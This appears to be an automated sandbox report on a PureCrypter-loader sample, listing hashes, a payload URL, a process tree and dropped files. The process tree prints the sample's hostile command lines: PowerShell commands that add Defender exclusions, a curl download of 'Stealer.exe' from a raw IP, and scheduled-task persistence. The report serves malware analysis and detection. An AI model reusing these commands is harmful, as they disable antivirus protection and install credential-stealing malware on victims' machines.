Analysis
max time kernel: 92s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20221111-en
resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
submitted: 25-01-2023 07:58

Static task: static1
Behavioral task: behavioral1
  Sample: c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe
  Resource: win7-20221111-en
Behavioral task: behavioral2
  Sample: c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe
  Resource: win10v2004-20221111-en
General
Target: c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe
Size: 1.3MB
MD5: f1c29ba01377c35e6f920f0aa626eaf5
SHA1: 7b2c191bc2d5d549c5e65613f93d59ece1842f02
SHA256: c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b
SHA512: 449a9d0ec42f83be09ef7a258f50f3d07728bb9f06361dc4aebdcbcce0ca010a3c894a5d27d98f197d6b4b85be4e3639656ae75a0216e8e169c54717ad2a85f0
SSDEEP: 24576:hT+ua8m657w6ZBLmkitKqBCjC0PDgM5AVnipXD1Z+7:hcVV1BCjBG2
Malware Config
Extracted: purecrypter
URL: https://cents-ability.org/loader/uploads/noicon_Ujizjydo.bmp
Signatures

PureCrypter
PureCrypter is a .NET malware loader first seen in early 2021.

Executes dropped EXE (2 IoCs)
Processes:
  pid   | process
  1772  | noicon.exe
  64    | Stearler.exe
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence check.
Processes:
  description       | ioc                                                                                          | process
  Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe
  Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | Stearler.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTPs, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
  pid   | process
  3644  | schtasks.exe
  2168  | schtasks.exe
Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes:
  pid   | process
  4288  | powershell.exe
  4288  | powershell.exe
  3420  | powershell.exe
  3420  | powershell.exe
Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description             | pid   | process
  Token: SeDebugPrivilege | 1772  | noicon.exe
  Token: SeDebugPrivilege | 4288  | powershell.exe
  Token: SeDebugPrivilege | 3420  | powershell.exe
Suspicious use of WriteProcessMemory (24 IoCs)
Processes:
  description                        | pid   | process                                                               | target process
  PID 4732 wrote to memory of 1772   | 4732  | c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe | noicon.exe
  PID 4732 wrote to memory of 1772   | 4732  | c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe | noicon.exe
  PID 4732 wrote to memory of 1772   | 4732  | c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe | noicon.exe
  PID 4732 wrote to memory of 64     | 4732  | c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe | Stearler.exe
  PID 4732 wrote to memory of 64     | 4732  | c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe | Stearler.exe
  PID 4732 wrote to memory of 64     | 4732  | c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe | Stearler.exe
  PID 4732 wrote to memory of 2592   | 4732  | c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe | cmd.exe
  PID 4732 wrote to memory of 2592   | 4732  | c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe | cmd.exe
  PID 2592 wrote to memory of 3644   | 2592  | cmd.exe                                                               | schtasks.exe
  PID 2592 wrote to memory of 3644   | 2592  | cmd.exe                                                               | schtasks.exe
  PID 2592 wrote to memory of 2168   | 2592  | cmd.exe                                                               | schtasks.exe
  PID 2592 wrote to memory of 2168   | 2592  | cmd.exe                                                               | schtasks.exe
  PID 64 wrote to memory of 3456     | 64    | Stearler.exe                                                          | cmd.exe
  PID 64 wrote to memory of 3456     | 64    | Stearler.exe                                                          | cmd.exe
  PID 64 wrote to memory of 3456     | 64    | Stearler.exe                                                          | cmd.exe
  PID 3456 wrote to memory of 4288   | 3456  | cmd.exe                                                               | powershell.exe
  PID 3456 wrote to memory of 4288   | 3456  | cmd.exe                                                               | powershell.exe
  PID 3456 wrote to memory of 4288   | 3456  | cmd.exe                                                               | powershell.exe
  PID 3456 wrote to memory of 3420   | 3456  | cmd.exe                                                               | powershell.exe
  PID 3456 wrote to memory of 3420   | 3456  | cmd.exe                                                               | powershell.exe
  PID 3456 wrote to memory of 3420   | 3456  | cmd.exe                                                               | powershell.exe
  PID 3456 wrote to memory of 4400   | 3456  | cmd.exe                                                               | curl.exe
  PID 3456 wrote to memory of 4400   | 3456  | cmd.exe                                                               | curl.exe
  PID 3456 wrote to memory of 4400   | 3456  | cmd.exe                                                               | curl.exe
Processes
(level 1) C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\c8f27a841f726761652f562c1e2c61b1eb4490c8b7bdd264f6fd08b8e5d92e4b.exe"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    (level 2) C:\Users\Administrator\Desktop\DROP\noicon.exe
        Command line: "C:\Users\Administrator\Desktop\DROP\noicon.exe"
        - Executes dropped EXE
        - Suspicious use of AdjustPrivilegeToken
    (level 2) C:\Users\Administrator\Desktop\DROP\Stearler.exe
        Command line: "C:\Users\Administrator\Desktop\DROP\Stearler.exe"
        - Executes dropped EXE
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory
        (level 3) C:\Windows\SysWOW64\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS838C.tmp\Testobfusc.bat" "
            - Suspicious use of WriteProcessMemory
            (level 4) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Command line: powershell -ep bypass -w hidden -Command Add-MpPreference -ExclusionExtension ".vbs"
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
            (level 4) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Command line: powershell -ep bypass -w hidden -Command Add-MpPreference -ExclusionPath "C:\Users\Public\Downloads"
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
            (level 4) C:\Windows\SysWOW64\curl.exe
                Command line: curl http://140.82.34.147/Stealer.exe -o C:\Users\Public\Downloads\Stealer.exe
    (level 2) C:\Windows\SYSTEM32\cmd.exe
        Command line: "cmd.exe"
        - Suspicious use of WriteProcessMemory
        (level 3) C:\Windows\system32\schtasks.exe
            Command line: schtasks /create /tn "testM" /xml "C:\Users\Admin\AppData\Local\Temp\f1.xml"
            - Creates scheduled task(s)
        (level 3) C:\Windows\system32\schtasks.exe
            Command line: schtasks /create /tn "test" /xml "C:\Users\Admin\AppData\Local\Temp\f2.xml"
            - Creates scheduled task(s)
Network

MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5: 968cb9309758126772781b83adb8a28f
  SHA1: 8da30e71accf186b2ba11da1797cf67f8f78b47c
  SHA256: 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
  SHA512: 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 18KB
  MD5: 443d4812f2139e4bcde2e71bbac34f60
  SHA1: 0e10245065ef5fe6979b522098d21993b2346c52
  SHA256: 1fec33ac2be90b663a7d1d530308bc8367b5c932fcc4b0dee550fbb248ec7919
  SHA512: e53f16a34651487650156c2c842e8af4fc6d13b1548bc2e665599fb43992a4c22ba6f572bcb44d2a44ac5c7479cc5d7e689a906363436d393e3444f0ecbf3517

C:\Users\Admin\AppData\Local\Temp\7zS838C.tmp\Testobfusc.bat
  Filesize: 14KB
  MD5: 40e65da3d99568737a62d30060539f23
  SHA1: c5b616eb054a850b019da2d19e42b82575a269c1
  SHA256: a9ea79963c53c3756fc752d4a2978a86de6038fc728fabc200bc87cd938406e5
  SHA512: ef19c1001097545955c2d4c3de48bcda7633459577cf3f54653ae0c89fea5e61e763645bdcd2027c303522c98a02893df1f7195b3d26d38a808e7cc78a5c325d

C:\Users\Admin\AppData\Local\Temp\f1.xml
  Filesize: 1KB
  MD5: d5d149b6de60fc4b8ae79a4123955efa
  SHA1: 9e76a623ff4999c3a0597000fc92d8c16b64b783
  SHA256: 381a91077f6813b09c642ecc089b362460384e19727adfcf6852121d06965cdf
  SHA512: 2f3c92063df61b1d3ea186763121b203839c30f2cc528fd7abf9cfffded16144edc98a2e52d331d4975c858081b8067c0ca5c028e21cb8c78cfbda0eb899aca0

C:\Users\Admin\AppData\Local\Temp\f2.xml
  Filesize: 1KB
  MD5: bde3b9bcaba83190f1b8793b5997cd00
  SHA1: a386e5ef10c24df4c5b667aaaadae8604d6c1efa
  SHA256: 756ce3e406b95d8c2a88e0a154eb0c7b12fa5f825046d400ff25ccf86dd1decc
  SHA512: dae4c9a06e9ba61146ad25ff376690949d9d9a50a8be87ece4c25da63ce47c261737bff8a284e3966b38aa410dfccee8bf6bb38d024a5ac8041e8dc8b55d10cc

C:\Users\Administrator\Desktop\DROP\Stearler.exe
  Filesize: 127KB
  MD5: c07c33c5e7c12107f2788280ad31c391
  SHA1: 8e14f012e98c39d6b20fe14a7532f299e5c001a0
  SHA256: 389b207183e0ea0fbc4beac9155486c5e6641d20aebd49eeaaa360dde72b7967
  SHA512: 8109a67532de5e35036680b66e2bdf06aa5067f1e601c4cf46f4c21721dc9dc3b2a65fcb77e01b74fa4246e1121ee058d81e8ec20c71dd8a2d906a73af88b0a1

C:\Users\Administrator\Desktop\DROP\noicon.exe
  Filesize: 16.0MB
  MD5: fdd4cd11d278dab26c2c8551e006c4ed
  SHA1: f0ef434d38fa11f8bc38cbc90874ca582867b214
  SHA256: 80d4414ca76e050007cb39c7fb598e1828ad168bea5725fb5466ee9388d6fa05
  SHA512: 9333eaba36a12bb0ab260c553bbed6ddb872fc42b05a2cf3552702c298b3d01d653467a00caa1b5232e9a828dce3810e67e08d1f2e245e4356248bf337fb96bb

Memory dumps:
  memory/64-139-0x0000000000000000-mapping.dmp
  memory/1772-146-0x0000000000710000-0x0000000000718000-memory.dmp  Filesize: 32KB
  memory/1772-137-0x0000000000000000-mapping.dmp
  memory/2168-148-0x0000000000000000-mapping.dmp
  memory/2592-143-0x0000000000000000-mapping.dmp
  memory/3420-169-0x0000000000000000-mapping.dmp
  memory/3420-172-0x000000006F410000-0x000000006F45C000-memory.dmp  Filesize: 304KB
  memory/3456-150-0x0000000000000000-mapping.dmp
  memory/3644-144-0x0000000000000000-mapping.dmp
  memory/4288-152-0x0000000000000000-mapping.dmp
  memory/4288-161-0x00000000065C0000-0x00000000065DE000-memory.dmp  Filesize: 120KB
  memory/4288-168-0x00000000075B0000-0x00000000075B8000-memory.dmp  Filesize: 32KB
  memory/4288-153-0x0000000002760000-0x0000000002796000-memory.dmp  Filesize: 216KB
  memory/4288-154-0x0000000005270000-0x0000000005898000-memory.dmp  Filesize: 6.2MB
  memory/4288-155-0x0000000005190000-0x00000000051B2000-memory.dmp  Filesize: 136KB
  memory/4288-156-0x00000000058A0000-0x0000000005906000-memory.dmp  Filesize: 408KB
  memory/4288-157-0x0000000005A00000-0x0000000005A66000-memory.dmp  Filesize: 408KB
  memory/4288-158-0x0000000006040000-0x000000000605E000-memory.dmp  Filesize: 120KB
  memory/4288-159-0x0000000006610000-0x0000000006642000-memory.dmp  Filesize: 200KB
  memory/4288-160-0x000000006F410000-0x000000006F45C000-memory.dmp  Filesize: 304KB
  memory/4288-167-0x0000000007680000-0x000000000769A000-memory.dmp  Filesize: 104KB
  memory/4288-162-0x0000000007980000-0x0000000007FFA000-memory.dmp  Filesize: 6.5MB
  memory/4288-163-0x0000000007330000-0x000000000734A000-memory.dmp  Filesize: 104KB
  memory/4288-164-0x0000000007390000-0x000000000739A000-memory.dmp  Filesize: 40KB
  memory/4288-165-0x00000000075C0000-0x0000000007656000-memory.dmp  Filesize: 600KB
  memory/4288-166-0x0000000007560000-0x000000000756E000-memory.dmp  Filesize: 56KB
  memory/4400-173-0x0000000000000000-mapping.dmp
  memory/4732-145-0x00007FF9C6AF0000-0x00007FF9C75B1000-memory.dmp  Filesize: 10.8MB
  memory/4732-132-0x0000000000C30000-0x0000000000D78000-memory.dmp  Filesize: 1.3MB
  memory/4732-136-0x000000001C630000-0x000000001C652000-memory.dmp  Filesize: 136KB
  memory/4732-135-0x00007FF9C6AF0000-0x00007FF9C75B1000-memory.dmp  Filesize: 10.8MB
  memory/4732-134-0x00000000015C0000-0x00000000015DE000-memory.dmp  Filesize: 120KB
  memory/4732-133-0x000000001C510000-0x000000001C586000-memory.dmp  Filesize: 472KB